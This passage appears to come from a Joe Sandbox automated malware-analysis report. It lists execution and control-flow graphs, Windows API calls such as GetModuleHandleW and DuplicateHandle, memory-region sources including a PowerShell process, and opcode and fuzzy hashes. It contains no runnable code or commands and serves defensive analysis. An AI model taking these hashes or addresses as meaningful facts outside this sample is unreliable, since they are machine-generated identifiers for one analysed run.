                                                                                                                            execution_graph 27305 273ac50 27309 273ad37 27305->27309 27314 273ad48 27305->27314 27306 273ac5f 27310 273ad7c 27309->27310 27311 273ad59 27309->27311 27310->27306 27311->27310 27312 273af80 GetModuleHandleW 27311->27312 27313 273afad 27312->27313 27313->27306 27315 273ad7c 27314->27315 27316 273ad59 27314->27316 27315->27306 27316->27315 27317 273af80 GetModuleHandleW 27316->27317 27318 273afad 27317->27318 27318->27306 27333 4e44050 27334 4e44092 27333->27334 27335 4e44099 27333->27335 27334->27335 27336 4e440ea CallWindowProcW 27334->27336 27336->27335 27319 273d3d8 27320 273d41e 27319->27320 27324 273d5b8 27320->27324 27327 273d5a8 27320->27327 27321 273d50b 27330 273b730 27324->27330 27328 273b730 DuplicateHandle 27327->27328 27329 273d5e6 27327->27329 27328->27329 27329->27321 27331 273d620 DuplicateHandle 27330->27331 27332 273d5e6 27331->27332 27332->27321 27337 2734668 27338 273467a 27337->27338 27339 2734686 27338->27339 27343 2734779 27338->27343 27348 2733e10 27339->27348 27341 27346a5 27344 273479d 27343->27344 27352 2734878 27344->27352 27356 2734888 27344->27356 27349 2733e1b 27348->27349 27364 2735c64 27349->27364 27351 2736fcf 27351->27341 27353 2734888 27352->27353 27355 273498c 27353->27355 27360 2734248 27353->27360 27358 27348af 27356->27358 27357 273498c 27357->27357 27358->27357 27359 2734248 CreateActCtxA 27358->27359 27359->27357 27361 2735918 CreateActCtxA 27360->27361 27363 27359db 27361->27363 27365 2735c6f 27364->27365 27368 2735c84 27365->27368 27367 2737085 27367->27351 27369 2735c8f 27368->27369 27372 2735cb4 27369->27372 27371 2737162 27371->27367 27373 2735cbf 27372->27373 27376 2735ce4 27373->27376 27375 2737265 27375->27371 27377 2735cef 27376->27377 27379 2738310 27377->27379 27383 27385b8 27377->27383 27378 27385a9 27378->27375 27379->27378 27389 273cd0f 27379->27389 27393 273cd10 27379->27393 27384 27385a3 27383->27384 27386 27385c7 27383->27386 27387 273cd10 2 API calls 27384->27387 27388 273cd0f 2 API calls 27384->27388 27385 27385a9 27385->27379 27386->27379 27387->27385 27388->27385 27391 273cd31 27389->27391 27390 273cd55 27390->27378 27391->27390 27397 273cec0 27391->27397 27394 273cd31 27393->27394 27395 273cd55 27394->27395 27396 273cec0 2 API calls 27394->27396 27395->27378 27396->27395 27398 273cecd 27397->27398 27399 273cf07 27398->27399 27401 273b720 27398->27401 27399->27390 27402 273b72b 27401->27402 27404 273dc18 27402->27404 27405 273d024 27402->27405 27406 273d02f 27405->27406 27407 2735ce4 2 API calls 27406->27407 27408 273dc87 27407->27408 27409 273dc96 27408->27409 27412 273dd00 27408->27412 27416 273dcf8 27408->27416 27409->27404 27413 273dd2e 27412->27413 27414 273ddfa KiUserCallbackDispatcher 27413->27414 27415 273ddff 27413->27415 27414->27415 27415->27415 27417 273dd2e 27416->27417 27418 273ddfa KiUserCallbackDispatcher 27417->27418 27419 273ddff 27417->27419 27418->27419

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 634 273ad48-273ad57 635 273ad83-273ad87 634->635 636 273ad59-273ad66 call 273a0a0 634->636 637 273ad9b-273addc 635->637 638 273ad89-273ad93 635->638 643 273ad68 636->643 644 273ad7c 636->644 645 273ade9-273adf7 637->645 646 273adde-273ade6 637->646 638->637 689 273ad6e call 273afe0 643->689 690 273ad6e call 273afd0 643->690 644->635 648 273ae1b-273ae1d 645->648 649 273adf9-273adfe 645->649 646->645 647 273ad74-273ad76 647->644 650 273aeb8-273af78 647->650 651 273ae20-273ae27 648->651 652 273ae00-273ae07 call 273a0ac 649->652 653 273ae09 649->653 684 273af80-273afab GetModuleHandleW 650->684 685 273af7a-273af7d 650->685 655 273ae34-273ae3b 651->655 656 273ae29-273ae31 651->656 654 273ae0b-273ae19 652->654 653->654 654->651 659 273ae48-273ae4a call 273a0bc 655->659 660 273ae3d-273ae45 655->660 656->655 663 273ae4f-273ae51 659->663 660->659 665 273ae53-273ae5b 663->665 666 273ae5e-273ae63 663->666 665->666 667 273ae81-273ae8e 666->667 668 273ae65-273ae6c 666->668 675 273aeb1-273aeb7 667->675 676 273ae90-273aeae 667->676 668->667 670 273ae6e-273ae7e call 273a0cc call 273a0dc 668->670 670->667 676->675 686 273afb4-273afc8 684->686 687 273afad-273afb3 684->687 685->684 687->686 689->647 690->647
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0273AF9E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4139747743.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2730000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule
                                                                                                                            • String ID: ,O$,O
                                                                                                                            • API String ID: 4139908857-201552661
                                                                                                                            • Opcode ID: f7d7b4f4513e8230c4c0eff6bc953bc489b9151aedb7c4325bd1d8a0f04d8901
                                                                                                                            • Instruction ID: 2e027f999586871c243deb94b986cba3fe01725ee0be404f733b5a5770041dd7
                                                                                                                            • Opcode Fuzzy Hash: f7d7b4f4513e8230c4c0eff6bc953bc489b9151aedb7c4325bd1d8a0f04d8901
                                                                                                                            • Instruction Fuzzy Hash: 157133B0A00B058FD725DF2AD15675ABBF1FF88304F008A2DD48ADBA51DB35E945CB91

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 880 2734248-27359d9 CreateActCtxA 883 27359e2-2735a3c 880->883 884 27359db-27359e1 880->884 891 2735a4b-2735a4f 883->891 892 2735a3e-2735a41 883->892 884->883 893 2735a51-2735a5d 891->893 894 2735a60 891->894 892->891 893->894 896 2735a61 894->896 896->896
                                                                                                                            APIs
                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 027359C9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4139747743.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2730000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2289755597-0
                                                                                                                            • Opcode ID: 8fd2ae5f0ce0f399aa6a64407d7650a68e171c63505f0cac8dcd16c8570ea5e7
                                                                                                                            • Instruction ID: 111ee0bf0f4114c1024c50e6d45c368729764022e9b31a058ada3ec2f3133200
                                                                                                                            • Opcode Fuzzy Hash: 8fd2ae5f0ce0f399aa6a64407d7650a68e171c63505f0cac8dcd16c8570ea5e7
                                                                                                                            • Instruction Fuzzy Hash: 9C41D1B0D0061DCBDB24CFA9C984B9EBBB5BF48308F64806AD408AB255DB756949CF90

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 897 273590d-2735912 898 273591c-27359d9 CreateActCtxA 897->898 900 27359e2-2735a3c 898->900 901 27359db-27359e1 898->901 908 2735a4b-2735a4f 900->908 909 2735a3e-2735a41 900->909 901->900 910 2735a51-2735a5d 908->910 911 2735a60 908->911 909->908 910->911 913 2735a61 911->913 913->913
                                                                                                                            APIs
                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 027359C9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4139747743.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2730000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2289755597-0
                                                                                                                            • Opcode ID: 55a7744d1aab1e46a3a52d761b112254c10cdcd5675700c3136717a90b2c6841
                                                                                                                            • Instruction ID: b05a7b633f452f5ae3fb4cf60943d9bd589709fb896e071223753fa4b46d036b
                                                                                                                            • Opcode Fuzzy Hash: 55a7744d1aab1e46a3a52d761b112254c10cdcd5675700c3136717a90b2c6841
                                                                                                                            • Instruction Fuzzy Hash: 5641E2B0D00619CFDB24DFA9C9847CEBBF5BF48304F6480AAD408AB255DB75694ACF90

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 914 4e44050-4e4408c 915 4e44092-4e44097 914->915 916 4e4413c-4e4415c 914->916 917 4e44099-4e440d0 915->917 918 4e440ea-4e44122 CallWindowProcW 915->918 922 4e4415f-4e4416c 916->922 925 4e440d2-4e440d8 917->925 926 4e440d9-4e440e8 917->926 919 4e44124-4e4412a 918->919 920 4e4412b-4e4413a 918->920 919->920 920->922 925->926 926->922
                                                                                                                            APIs
                                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 04E44111
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4170040227.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_4e40000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallProcWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2714655100-0
                                                                                                                            • Opcode ID: e505c91b20f22c0b1040314333e28ac242dcb59a981d189d68e93e422f403f93
                                                                                                                            • Instruction ID: 8a42680916ac6c27ea9759989eb5a59746b27360a015fd4273d8c0ec45382393
                                                                                                                            • Opcode Fuzzy Hash: e505c91b20f22c0b1040314333e28ac242dcb59a981d189d68e93e422f403f93
                                                                                                                            • Instruction Fuzzy Hash: 814157B8A00319DFDB14CF89D848BAABBF5FB88314F24C558D418AB361D334A841CFA1

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 928 273b730-273d6b4 DuplicateHandle 930 273d6b6-273d6bc 928->930 931 273d6bd-273d6da 928->931 930->931
                                                                                                                            APIs
                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0273D5E6,?,?,?,?,?), ref: 0273D6A7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4139747743.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2730000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DuplicateHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3793708945-0
                                                                                                                            • Opcode ID: d2405dfd2df9d34343e6b595587ba42f27410114c41770242dc1221f935b2465
                                                                                                                            • Instruction ID: b3947a032777d3b5490639c09630d806ef2b6db3bb575ac0d45e34c7e503ff6e
                                                                                                                            • Opcode Fuzzy Hash: d2405dfd2df9d34343e6b595587ba42f27410114c41770242dc1221f935b2465
                                                                                                                            • Instruction Fuzzy Hash: 6121E4B5900248EFDB10CF9AD584ADEBFF4EB48314F14841AE958A7311D374A950CFA5

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 934 273d619-273d6b4 DuplicateHandle 935 273d6b6-273d6bc 934->935 936 273d6bd-273d6da 934->936 935->936
                                                                                                                            APIs
                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0273D5E6,?,?,?,?,?), ref: 0273D6A7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4139747743.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2730000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DuplicateHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3793708945-0
                                                                                                                            • Opcode ID: 5b5d09f7cfbc58797ce7be7f3440be51c6f30d8b53828a9cc528e463b234a3cd
                                                                                                                            • Instruction ID: 922225c5abb8b53988c417d1e1792a282c83b1ac8f687362d006a90f26bd28d6
                                                                                                                            • Opcode Fuzzy Hash: 5b5d09f7cfbc58797ce7be7f3440be51c6f30d8b53828a9cc528e463b234a3cd
                                                                                                                            • Instruction Fuzzy Hash: 1121E2B5900209DFDB10CFAAD584ADEBBF5FB48324F14842AE958A7251C378A950CFA4

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 939 273af38-273af78 940 273af80-273afab GetModuleHandleW 939->940 941 273af7a-273af7d 939->941 942 273afb4-273afc8 940->942 943 273afad-273afb3 940->943 941->940 943->942
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0273AF9E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4139747743.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2730000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4139908857-0
                                                                                                                            • Opcode ID: 5f6951a231dff2aa52352f6dd5bc63fc0cf20a07fcdc29364b998314b2c13a51
                                                                                                                            • Instruction ID: 33878d968c95067b81287bcc24365dd5d678886d90480cc4e3f35d5d27837519
                                                                                                                            • Opcode Fuzzy Hash: 5f6951a231dff2aa52352f6dd5bc63fc0cf20a07fcdc29364b998314b2c13a51
                                                                                                                            • Instruction Fuzzy Hash: E71110B6C00749CFCB10CF9AC444ADEFBF4AB89328F10842AD858A7210C379A545CFA5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138951088.0000000000E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8D000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_e8d000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cd1ce990ac14698d2e67e43f363060f0524f4398ca380abfa65957e625cb1877
                                                                                                                            • Instruction ID: eb800cb0e1a36d6dbe4c68a4698428a500f3b8983bd0b04cce1ed66db01edc9b
                                                                                                                            • Opcode Fuzzy Hash: cd1ce990ac14698d2e67e43f363060f0524f4398ca380abfa65957e625cb1877
                                                                                                                            • Instruction Fuzzy Hash: 4B21F171508240DFCB05EF14D980B26BF65FB98318F20C56AE80D5A296C336D856CBA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4139125185.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_e9d000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9e481e432c17de7fe99785345720218726c4e312a5f1716702866fe82f8e72c5
                                                                                                                            • Instruction ID: f9a403e81774ab6edcfe0c1bd1bc13a92a01d41a00704ca367325a59bd69fbd1
                                                                                                                            • Opcode Fuzzy Hash: 9e481e432c17de7fe99785345720218726c4e312a5f1716702866fe82f8e72c5
                                                                                                                            • Instruction Fuzzy Hash: 1A21F271608300DFDF14DF24D984B26BBA6FB84318F20C569D84A5B296C33AD847CA61
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4139125185.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_e9d000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: af576032b2d5799a8225b516bcddfced89e3a9d4ac0b31a1aace564ee5c64fec
                                                                                                                            • Instruction ID: 54cf305b91fa581a4259452321e6deafbca062e699205432d404704bdee0d09d
                                                                                                                            • Opcode Fuzzy Hash: af576032b2d5799a8225b516bcddfced89e3a9d4ac0b31a1aace564ee5c64fec
                                                                                                                            • Instruction Fuzzy Hash: 632135B1508204DFDF00DF14DDC0B6ABBA5FB94329F24C669D8496B251C33AD846CAA2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4139125185.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_e9d000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9a90b8c8b1b5cf6a8a8399da1f669ef98af64604704b9ea520d58dd33ddfbabb
                                                                                                                            • Instruction ID: cf6d89a51d8693374fc9fac5f9dc6c5503d6726eff3cb62a76de67f4a91f4aae
                                                                                                                            • Opcode Fuzzy Hash: 9a90b8c8b1b5cf6a8a8399da1f669ef98af64604704b9ea520d58dd33ddfbabb
                                                                                                                            • Instruction Fuzzy Hash: BD21537550D3808FDB12CF24D994715BF71EB46318F28C5DAD8498F6A7C33A984ACB62
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138951088.0000000000E8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8D000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_e8d000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                            • Instruction ID: 25385170cfe1dd58b3c02829f1fd2ef48ecb1f0a1b38f9b402ec9d8e530ad5a8
                                                                                                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                            • Instruction Fuzzy Hash: AD110372404280CFCB02DF10D9C4B16BF71FB94328F24C6AAD80D0B656C336D85ACBA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4139125185.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_e9d000_00.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                            • Instruction ID: 516aaf47e860a3a60cea990bd5f56813a1891257d388d86af31c17fbd05e61ec
                                                                                                                            • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                            • Instruction Fuzzy Hash: 0311E275508280CFCB01CF10D9C4B19FF61FB84328F24C6AAD8494B642C33AD80ACB92
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.1854041257.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_76f0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                            • API String ID: 0-1420252700
                                                                                                                            • Opcode ID: 11bc4817077ef5dc22b9a99792cb1578f851f875a32398d6e2c5fb0ed1199001
                                                                                                                            • Instruction ID: d7d5266a959ef8a63336f951e4acfe2329452cd671ba6ec8b7262de448169dfb
                                                                                                                            • Opcode Fuzzy Hash: 11bc4817077ef5dc22b9a99792cb1578f851f875a32398d6e2c5fb0ed1199001
                                                                                                                            • Instruction Fuzzy Hash: 591227B1B04319DFC7198B7998117ABBBE2AF82350F14C47BD606CB755DA32C942C7A2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.1840796317.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_47e0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ,
                                                                                                                            • API String ID: 0-3772416878
                                                                                                                            • Opcode ID: a48763712954d64f6170b33bc4be7bdd5323924be4816a3d29a6b89d104505c3
                                                                                                                            • Instruction ID: 36600b5f35cd6ac5d4e34f0611b2425e0f2e39e266ecd03ce0a4270368efdea1
                                                                                                                            • Opcode Fuzzy Hash: a48763712954d64f6170b33bc4be7bdd5323924be4816a3d29a6b89d104505c3
                                                                                                                            • Instruction Fuzzy Hash: 16316FB4A092898FCB01DF68C8909A9BFB1FF4A310F1985DAD944DB353C235ED45CBA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.1854041257.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_76f0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5e7b721890a70833d4637b77a4d1c5b2ad79aca8b313899e580edd107a14105f
                                                                                                                            • Instruction ID: f8427d448b4fc5085f6d165d24579c5ba96b01f14af2f180b9980ca75642782a
                                                                                                                            • Opcode Fuzzy Hash: 5e7b721890a70833d4637b77a4d1c5b2ad79aca8b313899e580edd107a14105f
                                                                                                                            • Instruction Fuzzy Hash: CC41FCF0A00206DFCB288F7585016BA7BE3BF42294F5484AADA069F756D731DD41CBE2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.1840796317.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_47e0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4ec42a5a0ad2e3a57f02ff6537665db0c5117ffbcbc87c4c0524e3fe3ed20b88
                                                                                                                            • Instruction ID: ae40b67ce6f168ba186049fab92dc776e6d95a4aaf65774a94f1203528b02e25
                                                                                                                            • Opcode Fuzzy Hash: 4ec42a5a0ad2e3a57f02ff6537665db0c5117ffbcbc87c4c0524e3fe3ed20b88
                                                                                                                            • Instruction Fuzzy Hash: 0F418E34A002089FCB05DFA9D580AADBBF2FF89300F6585A9E5449B366DB35ED46CB50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.1840796317.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_47e0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5bb7b495df30fca0f02d870a44808d0eb16578894445157f3b4067c3d8eb82f1
                                                                                                                            • Instruction ID: fdfd74c24d7883974235a4c1066a00d49853504014ee25c1f8f491c01d214da9
                                                                                                                            • Opcode Fuzzy Hash: 5bb7b495df30fca0f02d870a44808d0eb16578894445157f3b4067c3d8eb82f1
                                                                                                                            • Instruction Fuzzy Hash: 89317074A093959FCB06EF6DC8909AABFB0EF4A300B0545DBD444DB363C624EC49CBA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.1840229080.0000000002F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F2D000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f2d000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fd3c8ce0b0ced5b734205cd3386d3db1c1224cdab82b2a88fa259bc947633e85
                                                                                                                            • Instruction ID: 16c349199dd51fe97b46997abac2d90e22359ec5ffd01ad283f770e0a02205cf
                                                                                                                            • Opcode Fuzzy Hash: fd3c8ce0b0ced5b734205cd3386d3db1c1224cdab82b2a88fa259bc947633e85
                                                                                                                            • Instruction Fuzzy Hash: F1012B315083109AE710CB25CD84767BF98DF427A4F08C42AEE484B15AC379D849C6B1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.1840229080.0000000002F2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F2D000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f2d000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b77bb48d75f9d0194e2b431a39b69c025bf48b74ec98d2623e7d67afa2cb42bc
                                                                                                                            • Instruction ID: 1114e7b424d5070ab7b6dc51f2e6d6d02165e6d3d4d09254e963c252d29d0a52
                                                                                                                            • Opcode Fuzzy Hash: b77bb48d75f9d0194e2b431a39b69c025bf48b74ec98d2623e7d67afa2cb42bc
                                                                                                                            • Instruction Fuzzy Hash: E9015E6140E3C09ED7128B258D94B52BFB4EF47624F1DC0DBD9888F1A7C2699849C772
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.1840796317.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_47e0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cb2f209bc85fd3fd8086b1bc26e356353d69b0cb85c324099fa55df23043c342
                                                                                                                            • Instruction ID: 5a68acc05b0c870832dbb36d36ccbb16588e0f52afcdac3b3c9f7367c5d91899
                                                                                                                            • Opcode Fuzzy Hash: cb2f209bc85fd3fd8086b1bc26e356353d69b0cb85c324099fa55df23043c342
                                                                                                                            • Instruction Fuzzy Hash: A1F06275E00104DFCB04CF99C8885A9FBB6FF8C310B258559D95A97711CA36AC66CB91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.1840796317.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_47e0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f1afc928cad530c6ac675de3c5d380c1a56d2c1789335a95976477c750ecaad9
                                                                                                                            • Instruction ID: 53ba39c3650746e52d9ec12f411596e462f106e0127e2c05292c8f6e4a1f20d5
                                                                                                                            • Opcode Fuzzy Hash: f1afc928cad530c6ac675de3c5d380c1a56d2c1789335a95976477c750ecaad9
                                                                                                                            • Instruction Fuzzy Hash: C5F0D435A001099FCB15CF9DD990AEEF7B5FF88324F208299E515A73A1C736AC52CB61
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.1854041257.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_76f0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                                                                            • API String ID: 0-3865595929
                                                                                                                            • Opcode ID: 13ec961c6debdae0f61cd0a97fcd404f9d5c509b447a70eca29ca8ed69a538e9
                                                                                                                            • Instruction ID: 58d41488833407ab87b77008246188a2a4d22feb5a8c09b2aa03af338dc6bb2d
                                                                                                                            • Opcode Fuzzy Hash: 13ec961c6debdae0f61cd0a97fcd404f9d5c509b447a70eca29ca8ed69a538e9
                                                                                                                            • Instruction Fuzzy Hash: 0DA158B1704309DFC7299B799810B67BBE6AFC7250F18846BD606CB361DA32CC45C761
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.1854041257.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_76f0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                            • API String ID: 0-1608119003
                                                                                                                            • Opcode ID: 6cb51515d269f14847a44656652c5f4fe01c4a21bd49701b481094d6c2261dc5
